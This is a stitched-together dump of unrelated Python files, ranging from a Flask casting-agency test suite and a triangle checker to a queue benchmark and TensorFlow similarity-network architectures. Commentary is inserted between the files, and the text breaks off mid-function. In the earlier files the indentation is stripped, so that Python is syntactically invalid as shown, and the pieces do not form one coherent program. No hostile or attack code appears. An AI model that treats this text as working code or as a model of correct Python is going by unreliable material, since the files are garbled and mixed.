# File: test_app.py | Repo: nesreensada/FSND-capstone | License: MIT
import os
import unittest
import json
from flask_sqlalchemy import SQLAlchemy
from app import create_app
from models import Movies, Actor, setup_db
DB_PATH = os.getenv('DATABASE_URL',
"postgresql://postgres@localhost:5432/casting_agency")
EXECUTIVE_PRODUCER_TOKEN = os.getenv("TOKEN")
headers = {'Authorization': f'Bearer {EXECUTIVE_PRODUCER_TOKEN}'}
class CastingTestCase(unittest.TestCase):
"""This class represents the Casting Agency test case"""
def setUp(self):
"""Define test variables and initialize app."""
self.app = create_app()
self.client = self.app.test_client
self.database_path = DB_PATH
setup_db(self.app, self.database_path)
self.actor = {
"name": "Nicholas Cage gdc",
"date_of_birth": "1950-03-9",
"gender": "M"
}
self.movie = {
"title": "Star Wars forever",
"duration": 120,
"release_year": "1971"
}
def tearDown(self):
"""Executed after reach test"""
pass
def test_get_authorization_url(self):
"""Test authorization url"""
res = self.client().get('/authorization/url')
self.assertEqual(res.status_code, 200)
def test_401_create_movie_noheader(self):
"""Test get movies without header """
res = self.client().post('/movies', json=self.movie)
data = json.loads(res.data)
self.assertEqual(res.status_code, 401)
self.assertEqual(data['success'], False)
self.assertEqual(data['message'], 'authorization_header_missing')
def test_200_create_movie_header(self):
"""Test get movies without header """
res = self.client().post('/movies', json=self.movie, headers=headers)
data = json.loads(res.data)
self.assertEqual(res.status_code, 200)
self.assertEqual(data['success'], True)
self.assertTrue(len(data['movie']))
def test_200_get_movies_noheader(self):
"""Test get movies without header since it does not require a header"""
res = self.client().get('/movies')
data = json.loads(res.data)
self.assertEqual(res.status_code, 200)
self.assertEqual(data['success'], True)
self.assertTrue(len(data['movie']))
def test_200_get_movies_header(self):
"""Test get movies with header """
res = self.client().get('/movies', headers=headers)
data = json.loads(res.data)
self.assertEqual(res.status_code, 200)
self.assertEqual(data['success'], True)
self.assertTrue(len(data['movie']))
def test_404_get_movie_id_header(self):
"""Test get movies by ID that is not found """
res = self.client().get('/movies/290', headers=headers)
data = json.loads(res.data)
self.assertEqual(res.status_code, 404)
self.assertEqual(data['success'], False)
self.assertEqual(data['message'], 'resource not found')
def test_401_get_movie_id_noheader(self):
"""Test get movies without header """
movie_id = Movies.query.all()[0].id
res = self.client().get(f'/movies/{movie_id}')
data = json.loads(res.data)
self.assertEqual(res.status_code, 401)
self.assertEqual(data['success'], False)
self.assertEqual(data['message'], 'authorization_header_missing')
def test_200_get_movie_id_header(self):
"""Test get movies by ID not found """
movie_id = Movies.query.all()[0].id
res = self.client().get(f'/movies/{movie_id}', headers=headers)
data = json.loads(res.data)
self.assertEqual(res.status_code, 200)
self.assertEqual(data['success'], True)
self.assertTrue(len(data['movie']))
def test_401_patch_movie_noheader(self):
"""Test patch movies without header """
movie_id = Movies.query.all()[0].id
data = {"duration": 150}
res = self.client().patch(f'/movies/{movie_id}', json=data)
data = json.loads(res.data)
self.assertEqual(res.status_code, 401)
self.assertEqual(data['success'], False)
self.assertEqual(data['message'], 'authorization_header_missing')
def test_404_patch_movie_header(self):
"""Test patch movies for a non found movie"""
data = {"duration": 150}
res = self.client().patch('/movies/290',
json=data, headers=headers)
data = json.loads(res.data)
self.assertEqual(res.status_code, 404)
self.assertEqual(data['success'], False)
self.assertEqual(data['message'], 'resource not found')
def test_200_patch_movie_header(self):
"""Test patch movies for a movie"""
movie_id = Movies.query.all()[0].id
data = {"duration": 150}
res = self.client().patch(f'/movies/{movie_id}',
json=data, headers=headers)
data = json.loads(res.data)
self.assertEqual(res.status_code, 200)
self.assertEqual(data['success'], True)
self.assertTrue(len(data['movie']))
def test_404_delete_movie_id_header(self):
"""Test get movies by ID that is not found """
res = self.client().delete('/movies/20', headers=headers)
data = json.loads(res.data)
self.assertEqual(res.status_code, 404)
self.assertEqual(data['success'], False)
self.assertEqual(data['message'], 'resource not found')
def test_401_delete_movie_id_noheader(self):
"""Test get movies without header """
movie_id = Movies.query.all()[0].id
res = self.client().delete(f'/movies/{movie_id}')
data = json.loads(res.data)
self.assertEqual(res.status_code, 401)
self.assertEqual(data['success'], False)
self.assertEqual(data['message'], 'authorization_header_missing')
def test_200_delete_movie_id_header(self):
"""Test get movies by ID not found """
movie_id = Movies.query.all()[0].id
res = self.client().delete(f'/movies/{movie_id}', headers=headers)
data = json.loads(res.data)
self.assertEqual(res.status_code, 200)
self.assertEqual(data['success'], True)
def test_401_create_actors_noheader(self):
"""Test get actors without header """
res = self.client().post('/actors', json=self.actor)
data = json.loads(res.data)
self.assertEqual(res.status_code, 401)
self.assertEqual(data['success'], False)
self.assertEqual(data['message'], 'authorization_header_missing')
def test_200_create_actor_header(self):
"""Test get actors with header """
res = self.client().post('/actors', json=self.actor, headers=headers)
data = json.loads(res.data)
self.assertEqual(res.status_code, 200)
self.assertEqual(data['success'], True)
self.assertTrue(len(data['actor']))
def test_404_get_actor_id_header(self):
"""Test get actors by ID that is not found """
res = self.client().get('/actors/100', headers=headers)
data = json.loads(res.data)
self.assertEqual(res.status_code, 404)
self.assertEqual(data['success'], False)
self.assertEqual(data['message'], 'resource not found')
def test_401_get_actor_id_noheader(self):
"""Test get actors without header """
actor_id = Actor.query.all()[0].id
res = self.client().get(f'/actors/{actor_id}')
data = json.loads(res.data)
self.assertEqual(res.status_code, 401)
self.assertEqual(data['success'], False)
self.assertEqual(data['message'], 'authorization_header_missing')
def test_200_get_actor_id_header(self):
"""Test get actors by ID not found """
actor_id = Actor.query.all()[0].id
res = self.client().get(f'/actors/{actor_id}', headers=headers)
data = json.loads(res.data)
self.assertEqual(res.status_code, 200)
self.assertEqual(data['success'], True)
self.assertTrue(len(data['actor']))
def test_200_get_actors_noheader(self):
"""Test get actors without header since it does not require a header"""
res = self.client().get('/actors')
data = json.loads(res.data)
self.assertEqual(res.status_code, 200)
self.assertEqual(data['success'], True)
self.assertTrue(len(data['actor']))
def test_200_get_actors_header(self):
"""Test get actors with header """
res = self.client().get('/actors', headers=headers)
data = json.loads(res.data)
self.assertEqual(res.status_code, 200)
self.assertEqual(data['success'], True)
self.assertTrue(len(data['actor']))
def test_401_patch_actors_noheader(self):
"""Test patch actors without header """
actor_id = Actor.query.all()[0].id
data = {"date_of_birth": "1950-03-1"}
res = self.client().patch(f'/actors/{actor_id}',
json=data)
data = json.loads(res.data)
self.assertEqual(res.status_code, 401)
self.assertEqual(data['success'], False)
self.assertEqual(data['message'], 'authorization_header_missing')
def test_404_patch_actors_header(self):
"""Test patch actors for a non found movie"""
data = {"date_of_birth": "1950-03-1"}
res = self.client().patch('/actors/100', json=data, headers=headers)
data = json.loads(res.data)
self.assertEqual(res.status_code, 404)
self.assertEqual(data['success'], False)
self.assertEqual(data['message'], 'resource not found')
def test_200_patch_actor_header(self):
"""Test patch actors for a actors"""
actor_id = Actor.query.all()[0].id
data = {"date_of_birth": "1950-03-1"}
res = self.client().patch(f'/actors/{actor_id}',
json=data, headers=headers)
data = json.loads(res.data)
self.assertEqual(res.status_code, 200)
self.assertEqual(data['success'], True)
self.assertTrue(len(data['actor']))
def test_404_delete_actor_id_header(self):
"""Test get actors by ID that is not found """
res = self.client().delete('/actors/100', headers=headers)
data = json.loads(res.data)
self.assertEqual(res.status_code, 404)
self.assertEqual(data['success'], False)
self.assertEqual(data['message'], 'resource not found')
def test_401_delete_actor_id_noheader(self):
"""Test get actors without header """
actor_id = Actor.query.all()[0].id
res = self.client().delete(f'/actors/{actor_id}')
data = json.loads(res.data)
self.assertEqual(res.status_code, 401)
self.assertEqual(data['success'], False)
self.assertEqual(data['message'], 'authorization_header_missing')
def test_200_delete_actor_id_header(self):
"""Test get actors by ID not found """
actor_id = Actor.query.all()[0].id
res = self.client().delete(f'/actors/{actor_id}', headers=headers)
data = json.loads(res.data)
self.assertEqual(res.status_code, 200)
self.assertEqual(data['success'], True)
# Make the tests conveniently executable
if __name__ == "__main__":
unittest.main()
# File: math/Triangle Checker/python/triangle_checker.py | Repo: avi-pal/al-go-rithms | License: CC0-1.0
# encoding utf-8
def triangle_checker(a, b, c):
return a + b > c and a + c > b and b + c > a
print(triangle_checker(3, 3, 3))
print(triangle_checker(3, 4, 5))
print(triangle_checker(6, 9, 15))
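A few assertions exercise the triangle inequality the function encodes (a standalone sketch that duplicates the one-liner above so it runs on its own):

```python
def triangle_checker(a, b, c):
    # Three lengths form a triangle iff each pair sums to strictly more than the third.
    return a + b > c and a + c > b and b + c > a

assert triangle_checker(3, 3, 3)        # equilateral: valid
assert triangle_checker(3, 4, 5)        # right triangle: valid
assert not triangle_checker(6, 9, 15)   # degenerate: 6 + 9 == 15, not strictly greater
assert not triangle_checker(1, 2, 10)   # violates the triangle inequality
```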
# File: ddtrace/contrib/cassandra/patch.py | Repo: p7g/dd-trace-py | License: Apache-2.0, BSD-3-Clause
from .session import patch
from .session import unpatch
__all__ = ["patch", "unpatch"]
# File: vcfiterator/__init__.py | Repo: ousamg/vcfiterator | License: MIT
from vcfiterator.main import VcfIterator
# File: 7-assets/past-student-repos/LambdaSchool-master/m6/62a1/benchmarks/bm_queue.py | Repo: eengineergz/Lambda | License: MIT
import time
from ll_queue import LLQueue
from arr_queue import ArrQueue
n = 100000
llq = LLQueue()
arrq = ArrQueue()
start_time = time.time()
for i in range(n):
llq.enqueue(i)
end_time = time.time()
print(f"LLQueue enqueue time: {end_time - start_time} seconds")
start_time = time.time()
for i in range(n):
arrq.enqueue(i)
end_time = time.time()
print(f"ArrQueue enqueue time: {end_time - start_time} seconds")
start_time = time.time()
for i in range(n):
llq.dequeue()
end_time = time.time()
print(f"LLQueue dequeue time: {end_time - start_time} seconds")
start_time = time.time()
for i in range(n):
arrq.dequeue()
end_time = time.time()
print(f"ArrQueue dequeue time: {end_time - start_time} seconds")
# File: xview/models/similarityArchitectures.py | Repo: davesean/modular_semantic_segmentation | License: BSD-3-Clause
import tensorflow as tf
from .vgg16 import vgg16
from tensorflow.python.layers.layers import max_pooling2d
from xview.models.cGAN_ops import residual_block, deconv2d, instance_norm
import os
from glob import glob
class batch_norm(object):
def __init__(self, epsilon=1e-5, momentum = 0.9, name="batch_norm"):
with tf.variable_scope(name):
self.epsilon = epsilon
self.momentum = momentum
self.name = name
def __call__(self, x, train=True):
return tf.layers.batch_normalization(x,momentum=self.momentum, epsilon=self.epsilon, name=self.name, training=train)
def lrelu(x, leak=0.2, name="lrelu"):
return tf.maximum(x, leak*x)
def conv2d(input_, output_dim,
k_h=4, k_w=4, d_h=2, d_w=2, stddev=0.02,
name="conv2d",pad="SAME"):
with tf.variable_scope(name, reuse=tf.AUTO_REUSE):
w = tf.get_variable('w', [k_h, k_w, input_.get_shape()[-1], output_dim],
initializer=tf.truncated_normal_initializer(stddev=stddev))
if pad=="VALID":
conv = tf.pad(input_, [[0,0],[1,1],[1,1],[0,0]], mode="CONSTANT")
conv = tf.nn.conv2d(conv, w, strides=[1, d_h, d_w, 1], padding=pad)
elif pad=="VALID_NOPAD":
conv = tf.nn.conv2d(input_, w, strides=[1, d_h, d_w, 1], padding='VALID')
else:
conv = tf.nn.conv2d(input_, w, strides=[1, d_h, d_w, 1], padding=pad)
biases = tf.get_variable('biases', [output_dim], initializer=tf.constant_initializer(0.0))
conv = tf.reshape(tf.nn.bias_add(conv, biases), tf.shape(conv))
return conv
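conv2d supports three padding modes: "SAME", "VALID" (which first adds an explicit one-pixel constant pad on each side and then runs a VALID convolution), and "VALID_NOPAD" (a plain VALID convolution). The resulting spatial sizes can be checked with a small pure-Python helper (illustrative only, not part of the original file):

```python
import math

def conv_out_size(n, k, s, pad):
    # Spatial output size of conv2d above for an n-wide input,
    # kernel k, stride s, under each of its three padding modes.
    if pad == "SAME":
        return math.ceil(n / s)
    if pad == "VALID":
        n += 2  # the explicit tf.pad adds 1 pixel per side before the VALID conv
    return (n - k) // s + 1

# For a 256-wide input with the default k=4, stride 2:
# SAME -> 128, VALID -> 128, VALID_NOPAD -> 127
```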
def conv2d_from_tensors(input_, w, bias, d_h=2, d_w=2, pad="SAME"):
conv = tf.nn.conv2d(input_, w, strides=[1, d_h, d_w, 1], padding=pad)
conv = tf.reshape(tf.nn.bias_add(conv, bias), tf.shape(conv))
return conv
def instance_norm_from_tensors(x,scale,offset, epsilon=1e-5):
mean, var = tf.nn.moments(x, [1, 2], keep_dims=True)
out = scale * tf.div(x - mean, tf.sqrt(var + epsilon)) + offset
return out
def maxPool2d(input_,
k_h=4, k_w=4, d_h=2, d_w=2,
name="maxpool2d",pad="SAME"):
return tf.layers.max_pooling2d(inputs=input_, pool_size=[k_h, k_w], strides=[d_h, d_w], padding=pad, name=name)
def dense(input_, output_size, input_size, num_channels, name="dense", reuse=False, stddev=0.02, bias_start=0.0):
shape = input_size * input_size * num_channels
with tf.variable_scope(name):
matrix = tf.get_variable("Matrix", [shape, output_size], tf.float32,
tf.random_normal_initializer(stddev=stddev))
bias = tf.get_variable("bias", [output_size],
initializer=tf.constant_initializer(bias_start))
return tf.matmul(tf.layers.flatten(input_), matrix) + bias
class simArch(object):
def arch1(self, image, params, y=None, reuse=False, is_training=True, var_scope="sim_disc"):
# image is 256 x 256 x (input_c_dim + input_c_dim)
with tf.variable_scope(var_scope) as scope:
if reuse:
tf.get_variable_scope().reuse_variables()
else:
assert tf.get_variable_scope().reuse == False
h0 = lrelu(conv2d(image, self.df_dim, k_h=4, k_w=4, d_h=4, d_w=4, name='s_h0_conv'))
# h0 is (64 x 64 x self.df_dim)
# h1 = lrelu(self.s_bn1(conv2d(h0, self.df_dim*2, k_h=4, k_w=4, d_h=4, d_w=4, name='s_h1_conv'),train=is_training))
h1 = lrelu(conv2d(h0, self.df_dim*2, k_h=4, k_w=4, d_h=4, d_w=4, name='s_h1_conv'))
# h1 is (16 x 16 x self.df_dim*2)
h2 = conv2d(h1, 1, k_h=2, k_w=2, d_h=2, d_w=2, name='s_h2_conv')
# h2 is (8 x 8 x 1)
return tf.nn.sigmoid(h2), h2, params['entropy']
archs = {
'arch1': arch1
}
def arch1A(self, image, params, y=None, reuse=False, is_training=True, var_scope="sim_disc"):
# image is 256 x 256 x (input_c_dim + input_c_dim)
with tf.variable_scope(var_scope) as scope:
if reuse:
tf.get_variable_scope().reuse_variables()
else:
assert tf.get_variable_scope().reuse == False
image = ((image+1)/2)
h0 = lrelu(conv2d(image, self.df_dim, k_h=2, k_w=2, d_h=2, d_w=2, name='s_h0_conv'))
# h0 is (128 x 128 x self.df_dim)
h1 = lrelu(conv2d(h0, self.df_dim, k_h=2, k_w=2, d_h=2, d_w=2, name='s_h1_conv'))
h2 = lrelu(conv2d(h1, self.df_dim*2, k_h=2, k_w=2, d_h=2, d_w=2, name='s_h2_conv'))
h3 = lrelu(conv2d(h2, self.df_dim*2, k_h=2, k_w=2, d_h=2, d_w=2, name='s_h3_conv'))
h4 = conv2d(h3, 1, k_h=2, k_w=2, d_h=2, d_w=2, name='s_h4_conv')
# h4 is (8 x 8 x 1)
return tf.nn.sigmoid(h4), h4, params['entropy']
archs['arch1A'] = arch1A
def arch1B(self, image, params, y=None, reuse=False, is_training=True, var_scope="sim_disc"):
# image is 256 x 256 x (input_c_dim + input_c_dim)
with tf.variable_scope(var_scope) as scope:
if reuse:
tf.get_variable_scope().reuse_variables()
else:
assert tf.get_variable_scope().reuse == False
image = ((image+1)/2)
h0 = lrelu(conv2d(image, self.df_dim, k_h=3, k_w=3, d_h=2, d_w=2, name='s_h0_conv', pad="VALID"))
# h0 is (128 x 128 x self.df_dim)
h1 = lrelu(conv2d(h0, self.df_dim, k_h=3, k_w=3, d_h=2, d_w=2, name='s_h1_conv', pad="VALID"))
h2 = lrelu(conv2d(h1, self.df_dim*2, k_h=3, k_w=3, d_h=2, d_w=2, name='s_h2_conv', pad="VALID"))
h4 = conv2d(h2, 1, k_h=3, k_w=3, d_h=2, d_w=2, name='s_h4_conv', pad="VALID")
# h4 is (8 x 8 x 1)
return tf.nn.sigmoid(h4), h4, params['entropy']
archs['arch1B'] = arch1B
def arch2(self, image, params, y=None, reuse=False, is_training=True, var_scope="sim_disc"):
# image is 256 x 256 x (input_c_dim + input_c_dim)
with tf.variable_scope(var_scope) as scope:
if reuse:
tf.get_variable_scope().reuse_variables()
else:
assert tf.get_variable_scope().reuse == False
h0 = lrelu(conv2d(image, self.df_dim, k_h=1, k_w=1, d_h=1, d_w=1, name='s_h0_conv'))
# h0 is (256 x 256 x self.df_dim)
h1 = lrelu(conv2d(h0, self.df_dim*2, k_h=4, k_w=4, d_h=4, d_w=4, name='s_h1_conv'))
# h1 is (64 x 64 x self.df_dim*2)
h2 = maxPool2d(input_=h1, k_h=2, k_w=2, d_h=2, d_w=2, name="s_h2_maxpool2d")
# h2 is (32 x 32 x self.df_dim*2)
h3 = lrelu(conv2d(h2, self.df_dim*4, k_h=2, k_w=2, d_h=2, d_w=2, name='s_h3_conv'))
# h3 is (16 x 16 x self.df_dim*4)
h4 = conv2d(h3, 1, k_h=2, k_w=2, d_h=2, d_w=2, name='s_h4_conv')
# h4 is (8 x 8 x 1)
return tf.nn.sigmoid(h4), h4, params['entropy']
archs['arch2'] = arch2
def arch4(self, image, params, y=None, reuse=False, is_training=True, var_scope="sim_disc"):
with tf.variable_scope(var_scope) as scope:
if reuse:
tf.get_variable_scope().reuse_variables()
else:
assert tf.get_variable_scope().reuse == False
h0 = lrelu(conv2d(image, 64, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h0_conv'))
h1 = lrelu(conv2d(h0, 64, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h1_conv'))
pool1 = max_pooling2d(h1, [2, 2], [2, 2], name='s_pool1')
h2 = lrelu(conv2d(pool1, 128, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h2_conv'))
h3 = lrelu(conv2d(h2, 128, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h3_conv'))
pool2 = max_pooling2d(h3, [2, 2], [2, 2], name='s_pool2')
h4 = lrelu(conv2d(pool2, 256, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h4_conv'))
h5 = conv2d(h4, 1, k_h=8, k_w=8, d_h=8, d_w=8, name='s_h5_conv')
return tf.nn.sigmoid(h5), h5, params['entropy']
archs['arch4'] = arch4
def arch5(self, image, params, y=None, reuse=False, is_training=True, var_scope="sim_disc"):
"2ch pytorch impl from https://github.com/szagoruyko/cvpr15deepcompare/blob/master/pytorch/eval.py"
with tf.variable_scope(var_scope) as scope:
if reuse:
tf.get_variable_scope().reuse_variables()
else:
assert tf.get_variable_scope().reuse == False
image = (image+1)/2
h0 = lrelu(conv2d(image, 96, k_h=7, k_w=7, d_h=3, d_w=3, name='s_h0_conv'))
pool1 = max_pooling2d(h0, [2, 2], [2, 2], name='s_pool1', padding='same')
h1 = lrelu(conv2d(pool1, 192, k_h=5, k_w=5, d_h=1, d_w=1, name='s_h1_conv'))
pool2 = max_pooling2d(h1, [2, 2], [2, 2], name='s_pool2', padding='same')
h2 = lrelu(conv2d(pool2, 256, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h2_conv'))
out = dense(h2, input_size=3, output_size=1, num_channels=256,
reuse=reuse, name='s_dense_out')
return tf.nn.sigmoid(out), out, params['entropy']
archs['arch5'] = arch5
def arch6(self, image, params, y=None, reuse=False, is_training=True, var_scope="sim_disc"):
with tf.variable_scope(var_scope) as scope:
if reuse:
tf.get_variable_scope().reuse_variables()
else:
assert tf.get_variable_scope().reuse == False
h = (image+1)/2
h = tf.pad(h, [[0, 0], [2, 2], [2, 2], [0, 0]], "REFLECT")
h0 = lrelu(conv2d(h, 64, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h0_conv',pad="VALID_NOPAD"))
h1 = lrelu(conv2d(h0, 128, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h1_conv',pad="VALID_NOPAD"))
# flat = tf.layers.flatten(h1,name='s_flatten')
# out = dense(flat, input_size=32, output_size=1024, num_channels=128,
# reuse=reuse, name='s_dense_out')
out = (conv2d(h1, 1, k_h=1, k_w=1, d_h=1, d_w=1, name='s_h2_conv'))
return tf.nn.sigmoid(out), out, params['entropy']
archs['arch6'] = arch6
def arch7(self, image, params, y=None, reuse=False, is_training=True, var_scope="sim_disc"):
with tf.variable_scope(var_scope) as scope:
if reuse:
tf.get_variable_scope().reuse_variables()
else:
assert tf.get_variable_scope().reuse == False
h = (image+1)/2
h = tf.pad(h, [[0, 0], [3, 3], [3, 3], [0, 0]], "REFLECT")
h0 = lrelu(conv2d(h, 64, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h0_conv',pad="VALID_NOPAD"))
h1 = lrelu(conv2d(h0, 128, k_h=5, k_w=5, d_h=1, d_w=1, name='s_h1_conv',pad="VALID_NOPAD"))
h = h1
for i in range(3):
h = residual_block(h, n_channels=128, kernel_size=3, scope="resBlock_"+str(i), reuse=reuse)
h = lrelu(conv2d(h, 64, k_h=1, k_w=1, d_h=1, d_w=1, name='s_h2_conv'))
h = (conv2d(h, 1, k_h=1, k_w=1, d_h=1, d_w=1, name='s_h3_conv'))
return tf.nn.sigmoid(h), h, params['entropy']
archs['arch7'] = arch7
def arch8(self, image, params, y=None, reuse=False, is_training=True, var_scope="sim_disc"):
with tf.variable_scope(var_scope) as scope:
if reuse:
tf.get_variable_scope().reuse_variables()
else:
assert tf.get_variable_scope().reuse == False
h = (image+1)/2
h = tf.pad(h, [[0, 0], [8, 8], [8, 8], [0, 0]], "REFLECT")
h0 = lrelu(conv2d(h, 128, k_h=15, k_w=15, d_h=1, d_w=1, name='s_h0_conv',pad="VALID_NOPAD"))
h1 = lrelu(conv2d(h0, 256, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h1_conv',pad="VALID_NOPAD"))
h = h1
for i in range(5):
h = residual_block(h, n_channels=256, kernel_size=3, scope="resBlock_"+str(i), reuse=reuse)
h = lrelu(conv2d(h, 128, k_h=1, k_w=1, d_h=1, d_w=1, name='s_h2_conv'))
h = (conv2d(h, 1, k_h=1, k_w=1, d_h=1, d_w=1, name='s_h3_conv'))
return tf.nn.sigmoid(h), h, params['entropy']
archs['arch8'] = arch8
    def arch9(self, image, params, y=None, reuse=False, is_training=True, var_scope="sim_disc"):
        with tf.variable_scope(var_scope) as scope:
            if reuse:
                tf.get_variable_scope().reuse_variables()
            else:
                assert tf.get_variable_scope().reuse is False
            h = ((image+1)/2)*0.79375
            h0 = lrelu(conv2d(h, self.df_dim, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h0_conv'))
            h1 = lrelu(conv2d(h0, self.df_dim, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h1_conv'))
            pool1 = max_pooling2d(h1, [2, 2], [2, 2], name='s_pool1')
            h2 = lrelu(conv2d(pool1, self.df_dim*2, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h2_conv'))
            h3 = lrelu(conv2d(h2, self.df_dim*2, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h3_conv'))
            pool2 = max_pooling2d(h3, [2, 2], [2, 2], name='s_pool2')
            h4 = lrelu(conv2d(pool2, self.df_dim*4, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h4_conv'))
            # 8*8*256
            # flat = tf.layers.flatten(h4, name='s_flatten')
            d1 = lrelu(dense(h4, input_size=8, output_size=self.df_dim*16, num_channels=self.df_dim*4,
                             reuse=reuse, name='s_dense_out1'))
            d3 = dense(d1, input_size=4, output_size=1, num_channels=self.df_dim,
                       reuse=reuse, name='s_dense_out3')
            # return tf.nn.softmax(d3), d3, 'softmax'
            return tf.nn.sigmoid(d3), d3, params['entropy']
    archs['arch9'] = arch9
    def arch10(self, image, params, y=None, reuse=False, is_training=True, var_scope="sim_disc"):
        with tf.variable_scope(var_scope) as scope:
            if reuse:
                tf.get_variable_scope().reuse_variables()
            else:
                assert tf.get_variable_scope().reuse is False
            h = ((image+1)/2)*0.79375
            h0 = lrelu(conv2d(h, 64, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h0_conv'))
            h1 = lrelu(conv2d(h0, 64, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h1_conv'))
            pool1 = max_pooling2d(h1, [2, 2], [2, 2], name='s_pool1')
            h2 = lrelu(conv2d(pool1, 128, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h2_conv'))
            h3 = lrelu(conv2d(h2, 128, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h3_conv'))
            pool2 = max_pooling2d(h3, [2, 2], [2, 2], name='s_pool2')
            h4 = lrelu(conv2d(pool2, 256, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h4_conv'))
            # 8*8*256
            # flat = tf.layers.flatten(h4, name='s_flatten')
            d1 = lrelu(dense(h4, input_size=8, output_size=1024, num_channels=256,
                             reuse=reuse, name='s_dense_out1'))
            d2 = lrelu(dense(d1, input_size=2, output_size=1024, num_channels=256,
                             reuse=reuse, name='s_dense_out2'))
            d3 = dense(d2, input_size=2, output_size=1, num_channels=256,
                       reuse=reuse, name='s_dense_out3')
            # return tf.nn.softmax(d3), d3, 'softmax'
            return tf.nn.sigmoid(d3), d3, params['entropy']
    archs['arch10'] = arch10
    def arch12(self, image, params, y=None, reuse=False, is_training=True, var_scope="sim_disc"):
        with tf.variable_scope(var_scope) as scope:
            if reuse:
                tf.get_variable_scope().reuse_variables()
            else:
                assert tf.get_variable_scope().reuse is False
            h = ((image+1)/2)*0.79375
            h0 = lrelu(conv2d(h, self.df_dim, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h0_conv'))
            h1 = lrelu(conv2d(h0, self.df_dim, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h1_conv'))
            pool1 = max_pooling2d(h1, [2, 2], [2, 2], name='s_pool1')
            h2 = lrelu(conv2d(pool1, self.df_dim*2, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h2_conv'))
            h3 = lrelu(conv2d(h2, self.df_dim*2, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h3_conv'))
            pool2 = max_pooling2d(h3, [2, 2], [2, 2], name='s_pool2')
            h4 = lrelu(conv2d(pool2, self.df_dim*4, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h4_conv'))
            h5 = lrelu(conv2d(h4, self.df_dim*4, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h5_conv'))
            h6 = lrelu(conv2d(h5, self.df_dim*4, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h6_conv'))
            pool3 = max_pooling2d(h6, [2, 2], [2, 2], name='s_pool3')  # name fixed: original reused 's_pool2'
            h7 = lrelu(conv2d(pool3, self.df_dim*4, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h7_conv'))
            # 4x4x256
            dh1_out_shape = tf.stack([tf.shape(image)[0], tf.to_int32(tf.shape(image)[1]/4), tf.to_int32(tf.shape(image)[2]/4), self.df_dim*2])
            dh1 = lrelu(deconv2d(h7, output_shape=dh1_out_shape, name='s_dh1', filters=self.df_dim*2))
            # 8x8x128
            dh2_out_shape = tf.stack([tf.shape(image)[0], tf.to_int32(tf.shape(image)[1]/2), tf.to_int32(tf.shape(image)[2]/2), self.df_dim])
            dh2 = lrelu(deconv2d(dh1, output_shape=dh2_out_shape, name='s_dh2', filters=self.df_dim))
            # 16x16x64
            dh3_out_shape = tf.stack([tf.shape(image)[0], tf.shape(image)[1], tf.shape(image)[2], 1])
            dh3 = deconv2d(dh2, output_shape=dh3_out_shape, name='s_dh3', filters=1)
            # 32x32x1
            return tf.nn.sigmoid(dh3), dh3, params['entropy']
    archs['arch12'] = arch12
    def arch13(self, image, params, y=None, reuse=False, is_training=True, var_scope="sim_disc"):
        with tf.variable_scope(var_scope) as scope:
            if reuse:
                tf.get_variable_scope().reuse_variables()
            else:
                assert tf.get_variable_scope().reuse is False
            h = ((image+1)/2)*0.79375
            bp = 11
            h = tf.pad(h, [[0, 0], [bp, bp], [bp, bp], [0, 0]], "REFLECT")
            h0 = lrelu(conv2d(h, self.df_dim, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h0_conv', pad="VALID_NOPAD"))
            h1 = lrelu(conv2d(h0, self.df_dim, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h1_conv', pad="VALID_NOPAD"))
            pool1 = max_pooling2d(h1, [2, 2], [2, 2], name='s_pool1', padding='VALID')
            h2 = lrelu(conv2d(pool1, self.df_dim*2, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h2_conv', pad="VALID_NOPAD"))
            h3 = lrelu(conv2d(h2, self.df_dim*2, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h3_conv', pad="VALID_NOPAD"))
            pool2 = max_pooling2d(h3, [2, 2], [2, 2], name='s_pool2', padding='VALID')
            h4 = lrelu(conv2d(pool2, self.df_dim*4, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h4_conv', pad="VALID_NOPAD"))
            # 8x8x256
            # 8x8x128
            dh2_out_shape = tf.stack([tf.shape(image)[0], tf.to_int32(tf.shape(image)[1]/2), tf.to_int32(tf.shape(image)[2]/2), self.df_dim])
            dh2 = lrelu(deconv2d(h4, output_shape=dh2_out_shape, name='s_dh2', filters=self.df_dim))
            # 16x16x64
            dh3_out_shape = tf.stack([tf.shape(image)[0], tf.shape(image)[1], tf.shape(image)[2], 1])
            dh3 = deconv2d(dh2, output_shape=dh3_out_shape, name='s_dh3', filters=1)
            # 32x32x1
            return tf.nn.sigmoid(dh3), dh3, params['entropy']
    archs['arch13'] = arch13
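For the VALID-padded variants like `arch13`, the reflect-pad amount `bp = 11` is chosen so that, after all the shrinking VALID convolutions and poolings, the output grid lands exactly on the quarter-resolution size the shape comments describe. Assuming `pad="VALID_NOPAD"` behaves like a stride-1 VALID convolution and `max_pooling2d` here is 2x2/stride-2 VALID pooling (an assumption about these helper functions, not stated in the file), the arithmetic can be checked in plain Python:

```python
def valid_conv(size, k):
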